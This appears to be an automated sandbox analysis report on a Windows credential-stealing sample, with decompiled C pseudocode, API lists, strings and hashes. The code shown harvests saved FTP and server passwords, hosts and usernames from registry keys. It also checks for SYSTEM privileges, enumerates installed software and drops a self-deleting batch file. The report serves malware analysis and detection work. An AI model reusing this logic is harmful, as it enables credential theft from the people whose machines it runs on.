                                                                        • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,0000005C,?,00000000,?,C0000000,00000003,00000000), ref: 004107F3
                                                                        • lstrlenA.KERNEL32( :ktk del %1 if exist %1 goto ktk del %0 ,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,00000000,00000104,00000105,00000105,00000105), ref: 00410803
                                                                        • CloseHandle.KERNEL32(00410C71,00000000,00410C71, :ktk del %1 if exist %1 goto ktk del %0 ,00000000, :ktk del %1 if exist %1 goto ktk del %0 ,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,00000000), ref: 0041081A
                                                                        • wsprintfA.USER32 ref: 00410831
                                                                        • LoadLibraryA.KERNEL32(shell32.dll,00000105,00000105,00000105,?,?,00000105), ref: 0041083E
                                                                        • GetProcAddress.KERNEL32(00000000,ShellExecuteA), ref: 0041084D
                                                                        • ShellExecuteA.SHELL32(00000000,open,?,?,00000000,00000000,00000000,ShellExecuteA,shell32.dll,00000105,00000105,00000105,?,?,00000105), ref: 00410867
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$Createlstrcpywsprintf$AddressAllocCloseCountExecuteHandleLibraryLoadLocalModuleNamePathProcShellTempTicklstrcatlstrlen
                                                                        • String ID: :ktk del %1 if exist %1 goto ktk del %0 $ "%s" $%d.bat$ShellExecuteA$open$shell32.dll
                                                                        • API String ID: 2116904195-4169620016
                                                                        • Opcode ID: 5a27ab0cd15915a05e5231e08fcaa6e6ad12822a77b34612db5ee9e6cc8e6732
                                                                        • Instruction ID: ac578fb0db49b64cbbfa247985a17d63ff0acc43852cd1b9113235f47bfa6a9d
                                                                        • Opcode Fuzzy Hash: 5a27ab0cd15915a05e5231e08fcaa6e6ad12822a77b34612db5ee9e6cc8e6732
                                                                        • Instruction Fuzzy Hash: ED419E31B446057BDF19A6A68C03FEFB5B79B84704F24803A7215F62E1EAB84DC09A4C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004057C2(intOrPtr _a4, char* _a8) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				long _t29;
                                                                        
                                                                        				E00405662(_a4, _a8, "Pass", "Host", "User", "Port", "Remote Dir", "Server Type", 0xbeef0013); // executed
                                                                        				E00405662(_a4, _a8, "Server.Pass", "Server.Host", "Server.User", "Server.Port", "Path", "ServerType", 0xbeef0013);
                                                                        				E00405662(_a4, _a8, "Last Server Pass", "Last Server Host", "Last Server User", "Last Server Port", "Last Server Path", "Last Server Type", 0xbeef0014);
                                                                        				_t29 = RegOpenKeyA( *0x4140fe, _a8,  &_v8);
                                                                        				if(_t29 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D69(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						E004057C2(_a4, _v2068);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t29;
                                                                        			}










                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 00405862
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00405892
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004058E0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$User
                                                                        • API String ID: 1332880857-44262141
                                                                        • Opcode ID: 3a6fec7d79853db9d550c02d0bc0af093802cc0e0543318cab51293c358c822d
                                                                        • Instruction ID: 485885c6e778c5f0ce236eab50da9cdf0f754c6351278a17f13cbc202cb47549
                                                                        • Opcode Fuzzy Hash: 3a6fec7d79853db9d550c02d0bc0af093802cc0e0543318cab51293c358c822d
                                                                        • Instruction Fuzzy Hash: 29213B35680208BADF216E91EC12FDD7A75AB84B04F20C467B605751E1DBBD5A90AF4C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E00401FD8(void* __edx) {
                                                                        				void* _v8;
                                                                        				char _v4104;
                                                                        				int _v4108;
                                                                        				int _v4112;
                                                                        				char _v4116;
                                                                        				char _v4120;
                                                                        				int _v4124;
                                                                        				void* _v4128;
                                                                        				intOrPtr _v4132;
                                                                        				long _t56;
                                                                        				void** _t60;
                                                                        				void* _t61;
                                                                        				void* _t62;
                                                                        				void* _t63;
                                                                        				void* _t65;
                                                                        				void* _t71;
                                                                        				long _t76;
                                                                        				void* _t80;
                                                                        				intOrPtr _t83;
                                                                        				void* _t85;
                                                                        				void* _t86;
                                                                        				void* _t90;
                                                                        				void* _t91;
                                                                        				void* _t102;
                                                                        				void* _t112;
                                                                        				void* _t115;
                                                                        				void* _t120;
                                                                        
                                                                        				_t111 = __edx;
                                                                        				if( *0x414082 != 0) {
                                                                        					E004017D5( *0x414082);
                                                                        					 *0x414082 = 0;
                                                                        				}
                                                                        				if( *0x414086 != 0) {
                                                                        					E004017D5( *0x414086);
                                                                        					 *0x414086 = 0;
                                                                        				}
                                                                        				E00401000( &_v4116, _t111,  &_v4116); // executed
                                                                        				E00401000( &_v4120, _t111,  &_v4120);
                                                                        				_t56 = RegOpenKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall",  &_v8); // executed
                                                                        				if(_t56 != 0) {
                                                                        					L19:
                                                                        					E00401486(_v4116, 0);
                                                                        					E00401486(_v4120, 0);
                                                                        					_t60 =  &_v4128;
                                                                        					_push(_t60);
                                                                        					_push(_v4116);
                                                                        					L00410DBE();
                                                                        					if(_t60 >= 0) {
                                                                        						_v4124 = E0040106A(_t60, _t111, _v4116);
                                                                        						 *0x414082 = E004017EC(_v4124);
                                                                        						_t71 = GlobalLock(_v4128);
                                                                        						if(_t71 != 0) {
                                                                        							_t115 =  *0x414082; // 0x0
                                                                        							memcpy(_t115, _t71, _v4124);
                                                                        							_t120 = _t120 + 0xc;
                                                                        							GlobalUnlock(_v4128);
                                                                        						}
                                                                        					}
                                                                        					_t61 =  &_v4128;
                                                                        					_push(_t61);
                                                                        					_push(_v4120);
                                                                        					L00410DBE();
                                                                        					if(_t61 >= 0) {
                                                                        						_v4124 = E0040106A(_t61, _t111, _v4120);
                                                                        						_t65 = E004017EC(_v4124); // executed
                                                                        						 *0x414086 = _t65;
                                                                        						_t61 = GlobalLock(_v4128);
                                                                        						if(_t61 != 0) {
                                                                        							_t112 =  *0x414086; // 0x0
                                                                        							memcpy(_t112, _t61, _v4124);
                                                                        							_t61 = GlobalUnlock(_v4128);
                                                                        						}
                                                                        					}
                                                                        					_t62 = E00401019(_t61, _t111, _v4116); // executed
                                                                        					_t63 = E00401019(_t62, _t111, _v4120); // executed
                                                                        					return _t63;
                                                                        				}
                                                                        				_v4112 = 0;
                                                                        				while(1) {
                                                                        					_v4108 = 0xfff;
                                                                        					_t76 = RegEnumKeyExA(_v8, _v4112,  &_v4104,  &_v4108, 0, 0, 0, 0); // executed
                                                                        					if(_t76 != 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t80 = E00401D15("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", "\\");
                                                                        					if(_t80 != 0) {
                                                                        						_t111 = _t80;
                                                                        						_t83 = E00401D69(_t80,  &_v4104);
                                                                        						if(_t83 != 0) {
                                                                        							_v4132 = _t83;
                                                                        							_t85 = E00401C8E(0x80000002, _v4132, "UninstallString",  &_v4124); // executed
                                                                        							_t86 = _t85;
                                                                        							if(_t86 != 0 && _t86 > 1) {
                                                                        								_push(_t86);
                                                                        								E0040149B(_v4116, _t86, _v4124); // executed
                                                                        								_t90 = E00401C8E(0x80000002, _v4132, "DisplayName",  &_v4124); // executed
                                                                        								_t91 = _t90;
                                                                        								if(_t91 == 0 || _v4124 <= 1) {
                                                                        									E0040149B(_v4120,  &_v4104, lstrlenA( &_v4104) + 1);
                                                                        								} else {
                                                                        									_push(_t91);
                                                                        									E0040149B(_v4120,  &_v4104, lstrlenA( &_v4104));
                                                                        									_t102 = _t91;
                                                                        									E0040149B(_v4120, _t102, _v4124);
                                                                        									E004017D5();
                                                                        								}
                                                                        								E004017D5();
                                                                        							}
                                                                        							E004017D5(_v4132);
                                                                        						}
                                                                        					}
                                                                        					_v4112 = _v4112 + 1;
                                                                        				}
                                                                        				RegCloseKey(_v8);
                                                                        				goto L19;
                                                                        			}































                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00410BE4), ref: 00402045
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00402085
                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,80000002,?,DisplayName,?,?,00000000,?,00000000,80000002,?,UninstallString,?,00000000), ref: 00402138
                                                                        • lstrlenA.KERNEL32(?,80000002,?,DisplayName,?,?,00000000,?,00000000,80000002,?,UninstallString,?,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall), ref: 00402171
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        • RegCloseKey.ADVAPI32(00410BE4,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 004021A8
                                                                        • GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,?,?,?,?,00410BE4), ref: 004021D4
                                                                        • GlobalLock.KERNEL32 ref: 00402204
                                                                        • GlobalUnlock.KERNEL32(?,?,?,?,?,?,?,00000000,?,00000000,?,?,?,?,?,00410BE4), ref: 00402223
                                                                        • GetHGlobalFromStream.OLE32(?,?,?,?,?,00000000,?,00000000,?,?,?,?,?,00410BE4), ref: 00402235
                                                                        • GlobalLock.KERNEL32 ref: 00402265
                                                                        • GlobalUnlock.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,?), ref: 00402284
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Global$FromLocalLockStreamUnlocklstrlen$AllocCloseEnumFreeOpen
                                                                        • String ID: DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                        • API String ID: 4234118056-981893429
                                                                        • Opcode ID: f9bd6954dfc5f31b935a3032c7154f81423a94a048844a08175558ec570958a2
                                                                        • Instruction ID: cdaa908c494aa76102f7c826ddf0691054428348d69886b20b68bb6d83f450db
                                                                        • Opcode Fuzzy Hash: f9bd6954dfc5f31b935a3032c7154f81423a94a048844a08175558ec570958a2
                                                                        • Instruction Fuzzy Hash: AA613E71900158BADB31AB62CD46BEA7679AB04344F0040FBB688F11F1D6BD5EC4AF68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 76%
                                                                        			E00402B27(void* __eax, void* __edx) {
                                                                        				void* _v8;
                                                                        				long _v12;
                                                                        				void* _v16;
                                                                        				CHAR* _v20;
                                                                        				int _t26;
                                                                        				int _t32;
                                                                        				int _t39;
                                                                        				void* _t42;
                                                                        
                                                                        				if( *0x41440d != 0 &&  *0x414415 != 0 &&  *0x414419 != 0) {
                                                                        					_t42 = 0;
                                                                        					if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
                                                                        						_v12 = 0;
                                                                        						_t26 = GetTokenInformation(_v8, 1, 0, 0,  &_v12); // executed
                                                                        						if(_t26 == 0 && GetLastError() == 0x7a && _v12 != 0) {
                                                                        							_v16 = E004017EC(_v12);
                                                                        							_t32 = GetTokenInformation(_v8, 1, _v16, _v12,  &_v12); // executed
                                                                        							if(_t32 != 0) {
                                                                        								_push( &_v20);
                                                                        								_push( *_v16);
                                                                        								if( *0x414419() != 0) {
                                                                        									_t39 = lstrcmpA(_v20, "S-1-5-18"); // executed
                                                                        									if(_t39 == 0) {
                                                                        										_t42 = 1;
                                                                        									}
                                                                        									LocalFree(_v20);
                                                                        								}
                                                                        							}
                                                                        							E004017D5(_v16);
                                                                        						}
                                                                        						CloseHandle(_v8);
                                                                        					}
                                                                        					return _t42;
                                                                        				} else {
                                                                        					return 0;
                                                                        				}
                                                                        			}












                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 00402B56
                                                                        • OpenProcessToken.ADVAPI32(00000000,00000008,00410B87), ref: 00402B62
                                                                        • GetTokenInformation.KERNELBASE(00410B87,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00402B84
                                                                        • GetLastError.KERNEL32 ref: 00402B8E
                                                                        • GetTokenInformation.KERNELBASE(00410B87,00000001(TokenIntegrityLevel),?,00000000,00000000,00000000), ref: 00402BB8
                                                                        • ConvertSidToStringSidA.ADVAPI32(?,?), ref: 00402BCC
                                                                        • lstrcmpA.KERNEL32(?,S-1-5-18,?,?), ref: 00402BDE
                                                                        • LocalFree.KERNEL32(?,?,S-1-5-18,?,?), ref: 00402BEB
                                                                        • CloseHandle.KERNEL32(00410B87), ref: 00402BFB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Token$InformationProcess$CloseConvertCurrentErrorFreeHandleLastLocalOpenStringlstrcmp
                                                                        • String ID: S-1-5-18
                                                                        • API String ID: 795010888-4289277601
                                                                        • Opcode ID: 042bba242a62f65dbc0e78402b71d5b6602156a4b029cf2b9444344b761daa0e
                                                                        • Instruction ID: 29f45c5e056208b681b019c64babcbd0cb81e3e7f6b38da6c0e7be3b0a9b4890
                                                                        • Opcode Fuzzy Hash: 042bba242a62f65dbc0e78402b71d5b6602156a4b029cf2b9444344b761daa0e
                                                                        • Instruction Fuzzy Hash: D5218331A10209ABDF119FA4DD8ABEE7775BB40308F148576B110B51E1DBB8AA90DB4C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004064BB(void* __ecx, intOrPtr _a4, char* _a8) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				int* _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				intOrPtr _v2088;
                                                                        				char _v2092;
                                                                        				int* _v2096;
                                                                        				char _v2100;
                                                                        				char _v2104;
                                                                        				long _t62;
                                                                        				long _t63;
                                                                        				intOrPtr* _t78;
                                                                        				intOrPtr* _t82;
                                                                        
                                                                        				_t62 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
                                                                        				_t63 = _t62;
                                                                        				if(_t63 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D69(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						_v2080 = E00401C8E( *0x4140fe, _v2068, "Password",  &_v2104);
                                                                        						_v2072 = E00401C8E( *0x4140fe, _v2068, "Host", 0);
                                                                        						_v2076 = E00401C8E( *0x4140fe, _v2068, "Login", 0);
                                                                        						_v2084 = E00401C8E( *0x4140fe, _v2068, "InitialPath", 0);
                                                                        						_t78 = E00401C8E( *0x4140fe, _v2068, "Port",  &_v2092);
                                                                        						if(_t78 == 0 || _v2092 != 4) {
                                                                        							_v2088 = 0x15;
                                                                        						} else {
                                                                        							 *_t24 =  *_t78;
                                                                        						}
                                                                        						E004017D5(_t78);
                                                                        						_t82 = E00401C8E( *0x4140fe, _v2068, "PasswordType",  &_v2100);
                                                                        						if(_t82 == 0 || _v2100 != 4) {
                                                                        							_v2096 = 0;
                                                                        						} else {
                                                                        							 *_t29 =  *_t82;
                                                                        						}
                                                                        						E004017D5(_t82);
                                                                        						if(_v2080 != 0 && _v2096 == 2 && (E004041BC(_v2080,  &_v2104, 0) == 0 || _v2104 == 0)) {
                                                                        							E004017D5(_v2080);
                                                                        							_v2080 = 0;
                                                                        						}
                                                                        						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                        							E00401486(_a4, 0xbeef0002);
                                                                        							E004014E8(_a4, _v2072);
                                                                        							E004014E8(_a4, _v2076);
                                                                        							E004014BC(_a4, _v2080, _v2104);
                                                                        							E00401486(_a4, _v2088);
                                                                        							E004014E8(_a4, _v2084);
                                                                        						}
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2084);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t63;
                                                                        			}






















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 004064D1
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00406505
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406738
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: Host$InitialPath$Login$Password$PasswordType$Port
                                                                        • API String ID: 1332880857-4069465341
                                                                        • Opcode ID: 80731490caea3ff90da39b54fdb199bc9ec81c0457b14d07f2172303205ba02b
                                                                        • Instruction ID: 8a8b12953b7785bcc2616ac66f0380b51c334fa7c9da36678472f7619d2a13f1
                                                                        • Opcode Fuzzy Hash: 80731490caea3ff90da39b54fdb199bc9ec81c0457b14d07f2172303205ba02b
                                                                        • Instruction Fuzzy Hash: 8F51F43194012CEADF226B52CC42BD9BAB9BF04704F14C0BAA549750B1DB7A4EA1DFD8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040D0D7(void* __ecx, intOrPtr _a4, void* _a8, char* _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				char _v16;
                                                                        				int _v20;
                                                                        				char _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				intOrPtr _v2088;
                                                                        				intOrPtr _v2092;
                                                                        				char _v2096;
                                                                        				intOrPtr _v2100;
                                                                        				long _t68;
                                                                        				long _t69;
                                                                        				intOrPtr* _t84;
                                                                        				void* _t108;
                                                                        
                                                                        				_t108 = __ecx;
                                                                        				_t68 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                        				_t69 = _t68;
                                                                        				if(_t69 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v20 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2068,  &_v20, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2072 = E00401D15(E00401D15(_a12, "\\"),  &_v2068);
                                                                        						E004017D5(_t74);
                                                                        						_v2092 = E00401C8E(_a8, _v2072, "Password",  &_v16);
                                                                        						_v2076 = E00401C8E(_a8, _v2072, "ServerName", 0);
                                                                        						_v2080 = E00401C8E(_a8, _v2072, "UserID", 0);
                                                                        						_t84 = E00401C8E(_a8, _v2072, "PortNumber",  &_v2096);
                                                                        						if(_t84 == 0 || _v2096 != 4) {
                                                                        							_t85 = _t84;
                                                                        							if(_t84 != 0) {
                                                                        								E004017D5(_t85);
                                                                        							}
                                                                        							_v2084 = 0x15;
                                                                        						} else {
                                                                        							 *_t27 =  *_t84;
                                                                        							E004017D5(_t84);
                                                                        						}
                                                                        						_v2088 = E00401C8E(_a8, _v2072, "InitialDirectory", 0);
                                                                        						_v2100 = E00401C8E(_a8, _v2072, "ServerType", 0);
                                                                        						if(_v2092 != 0 && E004041BC(_v2092,  &_v16, 0x41603f) != 0 && _v16 != 0 && _v2080 != 0 && _v2076 != 0) {
                                                                        							E00401486(_a4, 0xbeef0010);
                                                                        							E004014E8(_a4, _v2076);
                                                                        							E004014E8(_a4, _v2080);
                                                                        							E004014BC(_a4, _v2092, _v16);
                                                                        							E00401486(_a4, _v2084);
                                                                        							E004014E8(_a4, _v2088);
                                                                        							E004014E8(_a4, _v2100);
                                                                        						}
                                                                        						E004017D5(_v2092);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2088);
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2100);
                                                                        						E0040D0D7(_t108, _a4, _a8, _v2072);
                                                                        						E004017D5(_v2072);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t69;
                                                                        			}

                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040D0EA
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040D11E
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D327
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: InitialDirectory$Password$PortNumber$ServerName$ServerType$UserID
                                                                        • API String ID: 1332880857-2649023343
                                                                        • Opcode ID: 88dc1074fb5cc77b61c74f26116f05aa703dde468a501575c52eb2f362b694c4
                                                                        • Instruction ID: f38a5596ae9a773ac0d22796df066d347c720fe0787782128e341da31621acfc
                                                                        • Opcode Fuzzy Hash: 88dc1074fb5cc77b61c74f26116f05aa703dde468a501575c52eb2f362b694c4
                                                                        • Instruction Fuzzy Hash: 5851B43194011CBADF226F91CC42BDD7AB9BF08314F14C0BAB548750B1DF7A9A95AF98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004079E2(intOrPtr _a4, void* _a8, char* _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				char _v2084;
                                                                        				intOrPtr _v2088;
                                                                        				intOrPtr _v2092;
                                                                        				intOrPtr* _v2096;
                                                                        				char _v2100;
                                                                        				long _t66;
                                                                        				long _t67;
                                                                        				intOrPtr* _t82;
                                                                        
                                                                        				_t66 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                        				_t67 = _t66;
                                                                        				if(_t67 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
                                                                        						E004017D5(_t72);
                                                                        						_v2080 = E00401C8E(_a8, _v2068, "Password", 0);
                                                                        						_v2072 = E00401C8E(_a8, _v2068, "HostName", 0);
                                                                        						_v2076 = E00401C8E(_a8, _v2068, "UserName", 0);
                                                                        						_v2088 = E00401C8E(_a8, _v2068, "RemoteDirectory", 0);
                                                                        						_t82 = E00401C8E( *0x4140fe, _v2068, "PortNumber",  &_v2084);
                                                                        						if(_t82 == 0 || _v2084 != 4) {
                                                                        							_t83 = _t82;
                                                                        							if(_t82 != 0) {
                                                                        								E004017D5(_t83);
                                                                        							}
                                                                        							_v2092 = 0x15;
                                                                        						} else {
                                                                        							 *_t28 =  *_t82;
                                                                        							E004017D5(_t82);
                                                                        						}
                                                                        						_v2096 = E00401C8E(_a8, _v2068, "FSProtocol",  &_v2100);
                                                                        						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                        							E00401486(_a4, 0xbeef0010);
                                                                        							E004014E8(_a4, _v2072);
                                                                        							E004014E8(_a4, _v2076);
                                                                        							E004014E8(_a4, _v2080);
                                                                        							E00401486(_a4, _v2092);
                                                                        							E004014E8(_a4, _v2088);
                                                                        							if(_v2096 == 0 || _v2100 != 4) {
                                                                        								E00401486(_a4, 0);
                                                                        							} else {
                                                                        								E00401486(_a4,  *_v2096);
                                                                        							}
                                                                        						}
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2088);
                                                                        						E004017D5(_v2096);
                                                                        						E004079E2(_a4, _a8, _v2068);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t67;
                                                                        			}

                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004079F5
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00407A29
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407C3F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: FSProtocol$HostName$Password$PortNumber$RemoteDirectory$UserName
                                                                        • API String ID: 1332880857-3874328862
                                                                        • Opcode ID: e7dcc81a1872de75ef4e3cd078b4c75d1f19b2552471e3a295db8d28e704e3f1
                                                                        • Instruction ID: fd264f026befac884e31df10338c99dd76bd249b7adf4ed45f8ce47fce3a56bd
                                                                        • Opcode Fuzzy Hash: e7dcc81a1872de75ef4e3cd078b4c75d1f19b2552471e3a295db8d28e704e3f1
                                                                        • Instruction Fuzzy Hash: 3451E73194411CEADF22AF61CC42BDD7AB5BF04308F10C0BAB548751B1DB7AAA919F99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040DCC7(void* _a4, char* _a8, intOrPtr _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				char _v2088;
                                                                        				char* _v2092;
                                                                        				intOrPtr _v2096;
                                                                        				char _v2100;
                                                                        				long _t67;
                                                                        				long _t68;
                                                                        
                                                                        				_t67 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
                                                                        				_t68 = _t67;
                                                                        				if(_t68 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2092 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						E004017D5(_t73);
                                                                        						_v2068 = E00401C8E(_a4, _v2092, "FTP destination server", 0);
                                                                        						_v2072 = E00401C8E(_a4, _v2092, "FTP destination user", 0);
                                                                        						_v2076 = E00401C8E(_a4, _v2092, "FTP destination password", 0);
                                                                        						_v2080 = E00401C8E(_a4, _v2092, "FTP destination port",  &_v2088);
                                                                        						_v2084 = E00401C8E(_a4, _v2092, "FTP destination catalog", 0);
                                                                        						_v2096 = E00401C8E(_a4, _v2092, "FTP profiles",  &_v2100);
                                                                        						if(_v2068 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                        							E00401486(_a12, 0xbeef0000);
                                                                        							E004014E8(_a12, _v2068);
                                                                        							E004014E8(_a12, _v2072);
                                                                        							E004014E8(_a12, _v2076);
                                                                        							E004014BC(_a12, _v2080, _v2088);
                                                                        							E004014E8(_a12, _v2084);
                                                                        						}
                                                                        						if(_v2100 != 0) {
                                                                        							E00401486(_a12, 0xbeef0001);
                                                                        							E004014BC(_a12, _v2096, _v2100);
                                                                        						}
                                                                        						E0040DCC7(_a4, _v2092, _a12);
                                                                        						E004017D5(_v2092);
                                                                        						E004017D5(_v2068);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2084);
                                                                        						E004017D5(_v2096);
                                                                        						_v12 = _v12 + 1;
